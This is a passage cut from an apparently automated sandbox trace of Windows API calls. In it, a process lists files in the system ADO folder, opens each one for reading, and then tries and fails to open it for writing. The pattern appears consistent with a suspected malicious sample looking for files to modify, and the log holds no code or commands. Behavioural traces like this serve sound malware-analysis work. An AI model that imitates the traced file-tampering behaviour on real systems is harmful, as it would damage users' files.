(dwErrCode=0x5) [0088.021] GetLastError () returned 0x5 [0088.021] SetLastError (dwErrCode=0x5) [0088.021] GetLastError () returned 0x5 [0088.021] SetLastError (dwErrCode=0x5) [0088.021] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ec68 | out: hHeap=0x20000) returned 1 [0088.021] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0088.021] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0088.021] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0088.021] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.021] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.022] FindNextFileW (in: hFindFile=0x78690, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x7e, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x82330, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x7e, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="do", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓䘀")) returned 0 [0088.022] FindClose (in: hFindFile=0x78690 | out: hFindFile=0x78690) returned 1 [0088.022] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0088.022] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0088.022] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0088.022] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0088.022] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0088.022] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0088.022] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b68 | out: hHeap=0x20000) returned 1 [0088.022] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0088.022] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0088.022] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x460b8 | out: hHeap=0x20000) returned 1 [0088.022] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf00 [0088.022] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0088.022] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0088.022] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0088.022] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0088.022] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0088.022] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0088.022] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0088.022] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0088.022] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0088.022] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0088.022] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8a400 [0088.022] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0088.022] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0088.022] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0088.022] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a400 | out: hHeap=0x20000) returned 1 [0088.022] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.022] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.022] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.022] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.022] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0088.023] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0088.023] AreFileApisANSI () returned 1 [0088.023] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\System\\ado\\msader15.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\System\\ado\\msader15.dll", lpUsedDefaultChar=0x0) returned 54 [0088.023] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53760 [0088.023] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.023] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.023] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0088.023] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0088.023] AreFileApisANSI () returned 1 [0088.023] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 54 [0088.023] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6c) returned 0x75cd8 [0088.023] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x75cd8, cchWideChar=54 | out: lpWideCharStr="C:\\Program Files\\Common Files\\System\\ado\\msader15.dll") returned 54 [0088.023] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\msader15.dll" (normalized: "c:\\program files\\common files\\system\\ado\\msader15.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x348 [0088.024] GetFileType (hFile=0x348) returned 0x1 [0088.024] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0088.024] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0088.024] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0088.025] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0088.025] CloseHandle (hObject=0x348) returned 1 [0088.025] AreFileApisANSI () returned 1 [0088.025] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 54 [0088.025] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6c) returned 0x75e40 [0088.025] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x75e40, cchWideChar=54 | out: lpWideCharStr="C:\\Program Files\\Common Files\\System\\ado\\msader15.dll") returned 54 [0088.025] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\msader15.dll" (normalized: "c:\\program files\\common files\\system\\ado\\msader15.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0088.025] GetLastError () returned 0x5 [0088.025] GetLastError () returned 0x5 [0088.025] SetLastError (dwErrCode=0x5) [0088.025] GetLastError () returned 0x5 [0088.025] SetLastError (dwErrCode=0x5) [0088.025] GetLastError () returned 0x5 [0088.025] SetLastError (dwErrCode=0x5) [0088.025] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75e40 | out: hHeap=0x20000) returned 1 [0088.025] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0088.025] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0088.025] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53760 | out: hHeap=0x20000) returned 1 [0088.025] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.025] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.025] FindNextFileW (in: hFindFile=0x78310, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x463fb128, ftCreationTime.dwHighDateTime=0x1d2fa08, ftLastAccessTime.dwLowDateTime=0xced4b5c5, ftLastAccessTime.dwHighDateTime=0x1d2fa09, ftLastWriteTime.dwLowDateTime=0x463fb128, ftLastWriteTime.dwHighDateTime=0x1d2fa08, nFileSizeHigh=0x0, nFileSizeLow=0x12d400, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="msado15.dll", cAlternateFileName="")) returned 1 [0088.026] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0088.026] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0088.026] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0088.026] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0088.026] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0088.026] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0088.026] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0088.026] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0088.026] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0088.026] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0088.026] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0088.026] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0088.026] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0088.026] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0088.026] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0088.026] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0088.026] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0088.026] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x716f0 [0088.026] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0088.026] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8a530 [0088.026] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x716f0 | out: hHeap=0x20000) returned 1 [0088.026] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0088.026] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0088.026] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a530 | out: hHeap=0x20000) returned 1 [0088.026] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.026] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.026] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.026] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.026] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0088.026] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0088.026] AreFileApisANSI () returned 1 [0088.026] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\System\\ado\\msado15.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\System\\ado\\msado15.dll", lpUsedDefaultChar=0x0) returned 53 [0088.026] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53400 [0088.026] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.026] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.026] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0088.027] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0088.027] AreFileApisANSI () returned 1 [0088.027] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53400, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 53 [0088.027] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x75d50 [0088.027] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53400, cbMultiByte=-1, lpWideCharStr=0x75d50, cchWideChar=53 | out: lpWideCharStr="C:\\Program Files\\Common Files\\System\\ado\\msado15.dll") returned 53 [0088.027] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\msado15.dll" (normalized: "c:\\program files\\common files\\system\\ado\\msado15.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x348 [0088.028] GetFileType (hFile=0x348) returned 0x1 [0088.028] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75d50 | out: hHeap=0x20000) returned 1 [0088.028] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0088.028] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0088.028] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0088.028] CloseHandle (hObject=0x348) returned 1 [0088.029] AreFileApisANSI () returned 1 [0088.029] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53400, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 53 [0088.029] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x75cd8 [0088.029] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53400, cbMultiByte=-1, lpWideCharStr=0x75cd8, cchWideChar=53 | out: lpWideCharStr="C:\\Program Files\\Common Files\\System\\ado\\msado15.dll") returned 53 [0088.029] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\msado15.dll" (normalized: "c:\\program files\\common files\\system\\ado\\msado15.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0088.029] GetLastError () returned 0x5 [0088.029] GetLastError () returned 0x5 [0088.029] SetLastError (dwErrCode=0x5) [0088.029] GetLastError () returned 0x5 [0088.029] SetLastError (dwErrCode=0x5) [0088.029] GetLastError () returned 0x5 [0088.029] SetLastError (dwErrCode=0x5) [0088.029] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0088.029] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0088.029] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0088.029] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53400 | out: hHeap=0x20000) returned 1 [0088.029] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.029] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.029] FindNextFileW (in: hFindFile=0x78310, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41cc3017, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x41cc3017, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x41cc3017, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xc600, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="msado20.tlb", cAlternateFileName="")) returned 1 [0088.029] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0088.029] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0088.029] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0088.029] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0088.029] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0088.029] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0088.029] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0088.029] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0088.029] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0088.030] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0088.030] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0088.030] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0088.030] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0088.030] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0088.030] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0088.030] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0088.030] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0088.030] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71bd0 [0088.030] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0088.030] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8a2d0 [0088.030] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71bd0 | out: hHeap=0x20000) returned 1 [0088.030] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0088.030] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0088.030] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a2d0 | out: hHeap=0x20000) returned 1 [0088.030] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.030] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.030] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.030] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.030] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0088.030] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0088.030] AreFileApisANSI () returned 1 [0088.030] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\System\\ado\\msado20.tlb", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\System\\ado\\msado20.tlb", lpUsedDefaultChar=0x0) returned 53 [0088.030] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0088.030] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.030] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.030] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0088.030] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0088.030] AreFileApisANSI () returned 1 [0088.030] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 53 [0088.031] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x75e40 [0088.031] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x75e40, cchWideChar=53 | out: lpWideCharStr="C:\\Program Files\\Common Files\\System\\ado\\msado20.tlb") returned 53 [0088.031] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\msado20.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msado20.tlb"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x348 [0088.124] GetFileType (hFile=0x348) returned 0x1 [0088.124] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75e40 | out: hHeap=0x20000) returned 1 [0088.124] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0088.124] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0088.124] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0088.125] CloseHandle (hObject=0x348) returned 1 [0088.125] AreFileApisANSI () returned 1 [0088.125] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 53 [0088.125] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x76188 [0088.125] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x76188, cchWideChar=53 | out: lpWideCharStr="C:\\Program Files\\Common Files\\System\\ado\\msado20.tlb") returned 53 [0088.125] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\msado20.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msado20.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0088.125] GetLastError () returned 0x5 [0088.125] GetLastError () returned 0x5 [0088.125] SetLastError (dwErrCode=0x5) [0088.125] GetLastError () returned 0x5 [0088.125] SetLastError (dwErrCode=0x5) [0088.125] GetLastError () returned 0x5 [0088.125] SetLastError (dwErrCode=0x5) [0088.125] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0088.125] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0088.125] HeapFree (in: 